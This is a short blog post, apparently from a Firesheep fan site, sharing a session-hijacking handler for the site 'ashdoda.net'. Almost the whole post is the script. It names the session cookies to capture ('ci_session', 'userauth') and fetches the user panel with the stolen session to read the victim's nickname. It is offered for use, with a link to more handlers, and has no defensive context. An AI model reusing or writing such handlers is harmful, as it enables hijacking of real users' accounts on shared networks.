// Author// cityZombie <chebon9@gmail.com>// For more handlers visit : http://firesheepfan.blogspot.com/
register({name: "Ashdoda.net",domains: [ 'ashdoda.net' ],sessionCookieNames: [ 'ci_session','userauth' ],identifyUser: function () {var resp = this.httpGet(this.siteUrl + "user/panel/");
this.userName = resp.body.querySelector("input[name='nick']").value;}});
No comments:
Post a Comment